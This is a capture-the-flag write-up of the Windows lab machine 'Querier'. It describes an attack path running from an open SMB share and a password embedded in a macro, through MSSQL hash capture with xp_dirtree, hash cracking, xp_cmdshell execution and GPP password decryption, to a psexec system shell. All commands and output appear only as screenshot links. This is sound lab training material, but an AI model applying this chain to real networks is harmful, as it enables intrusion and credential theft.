Querier was a straightforward Windows machine which I think was a fairly realistic box you might find on a typical corporate network.
Nmap scan:
![](/content/images/2019/06/image-15.png)
SMB is usually low-hanging fruit so I check out what shares are available:
![](/content/images/2019/06/image-16.png)
The 'Reports' share is unsecured so I connect with smbclient
and see a spreadsheet in it:
![](/content/images/2019/06/image-20.png)
Contents of the spreadsheet file:
![](/content/images/2019/06/image-18.png)
Microsoft Office documents (.doc, .xls, etc) are really zip archives so I unzip it and take a look at the vbaProject.bin file and find a login/password:
![](/content/images/2019/06/image-21.png)
These creds worked for rpcclient
but I couldn't really do anything with it and tried attacking SQL next with sqsh
.
![](/content/images/2019/06/image-22.png)
Unfortunately this account did not have permission to enable xp_cmdshell:
![](/content/images/2019/06/image-23.png)
![](/content/images/2019/06/image-24.png)
The next logical step was to see if I could capture hashes. I declared @q as a fake share on my attacking machine then tried to connect to it using dirtree:
![](/content/images/2019/06/image-27.png)
With impacket's SMB server listening, I get a hash:
![](/content/images/2019/06/image-28.png)
I saved the hash to 'fullhash.txt' and used John to crack it:
![](/content/images/2019/06/image-29.png)
I use these new creds with sqsh:
![](/content/images/2019/06/image-30.png)
This account does have permission to enable xp_cmdshell:
![](/content/images/2019/06/image-31.png)
Confirmation that I have code execution:
![](/content/images/2019/06/image-32.png)
I downloaded a mssql shell from here, edited it with the correct IP and creds and got a shell:
![](/content/images/2019/06/image-33.png)
User flag:
![](/content/images/2019/06/image-34.png)
To escalate privileges, one of the first things you look for on a Windows machine is a groups.xml
file:
![](/content/images/2019/06/image-35.png)
In it, you'll find an encrypted password:
![](/content/images/2019/06/image-36.png)
Use gpp-decrypt
to decrypt:
![](/content/images/2019/06/image-37.png)
Alternatively, you can use PowerUp.ps1. After transferring it to Querier, I run it and save the output to check.txt:
![](/content/images/2019/06/image-41.png)
Inside check.txt is the admin password:
![](/content/images/2019/06/image-39.png)
Now psexec is used to gain a system shell:
![](/content/images/2019/06/image-40.png)
Root flag:
![](/content/images/2019/06/image-42.png)